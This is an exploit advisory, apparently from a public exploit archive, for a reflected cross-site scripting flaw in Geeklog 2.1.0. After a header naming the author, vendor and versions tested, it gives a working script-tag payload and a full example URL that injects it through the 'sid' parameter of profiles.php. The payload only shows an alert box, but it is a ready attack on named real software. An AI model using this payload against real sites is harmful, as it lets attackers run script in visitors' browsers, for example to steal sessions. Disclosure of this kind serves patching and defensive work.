#################################################################################################
# Exploit title : Geeklog 2.1.0 Cross Site Scripting
# Google Dork : N/A
# Date : 06.10.2019
# Exploit Author : Mikayıl İlyas
# Twitter : https://twitter.com/mikayil_ilyas
# Vendor Homepage : https://www.geeklog.net/
# Software download : https://www.geeklog.net/downloads/visit.php/file_5b324b8ed4c56
# Version : 2.1.0
# Tested on : Windows 10 / Kali Linux
# CVE :
# Vulnerability Type : Cross site scripting / XSS
#################################################################################################
# Payload : '"()"><script>alert('xss')</script>
# Example : http://127.0.0.1/sc/public_html/profiles.php?sid=welcome'"()"><script>alert('xss')</script>&what=emailstory